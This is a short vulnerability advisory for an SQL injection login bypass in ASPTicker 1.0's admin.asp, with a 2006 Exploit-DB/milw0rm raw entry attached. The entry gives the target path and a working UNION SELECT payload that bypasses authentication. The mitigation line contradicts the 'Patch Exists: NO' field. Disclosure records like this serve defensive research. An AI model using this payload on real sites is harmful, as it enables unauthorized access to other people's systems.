Vendor: ASPTicker
By: ajann
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: ASPTicker
Affected Version From: ASPTicker 1.0
Affected Version To: ASPTicker 1.0
Patch Exists: NO
2006

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

ASPTicker 1.0 is vulnerable to SQL injection in the remote login handled by admin.asp. By injecting SQL into the login, an attacker can bypass authentication and gain unauthorized access to the system.

Mitigation:

Update ASPTicker to a patched version that fixes the SQL injection vulnerability.

Exploit-DB raw data:

*******************************************************************************
# Title   :  ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspapps.com
# $$      :  $ 17.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin.asp[ByPass]

Example:

//Password} 'union select 0,0,0 from password

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a hacker!

# milw0rm.com [2006-12-28]